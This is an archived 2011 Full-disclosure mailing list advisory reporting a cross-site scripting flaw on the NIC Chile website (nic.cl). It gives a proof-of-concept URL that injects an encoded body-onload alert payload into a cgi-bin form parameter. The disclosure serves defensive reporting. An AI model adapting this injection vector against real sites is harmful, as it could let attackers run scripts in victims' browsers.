[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-disclosure] XSS on NIC Chile
- To: full-disclosure@xxxxxxxxxxxxxxxxx
- Subject: [Full-disclosure] XSS on NIC Chile
- From: "Zerial." <fernando@xxxxxxxxxx>
- Date: Wed, 20 Apr 2011 12:36:20 -0300
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
* Main URI: http://www.nic.cl
* Type: Cross Site Scripting
* Exploitable URI:
http://www.nic.cl/cgi-bin/show-form?f=/example/201001191941%3Cbody%20onload=alert%28this%29%3E3a6
* Status: *Reported*
* Date: April 20, 2011, 12:27 p.m.
Reported on: http://www.secureless.org/vulnerability/1347/
- --
Zerial
Seguridad Informatica
GNU/Linux User #382319
Blog: http://blog.zerial.org
Jabber: zerial@xxxxxxxxxxxx
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.11 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/
iEYEARECAAYFAk2u/XQACgkQIP17Kywx9JTzjQCeNIbJsr/6fZ1Pr2mO8u7Jb3jA
TmsAoIdn2ceeo9iO4iC8MmwWO/6tUfRk
=sCbb
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/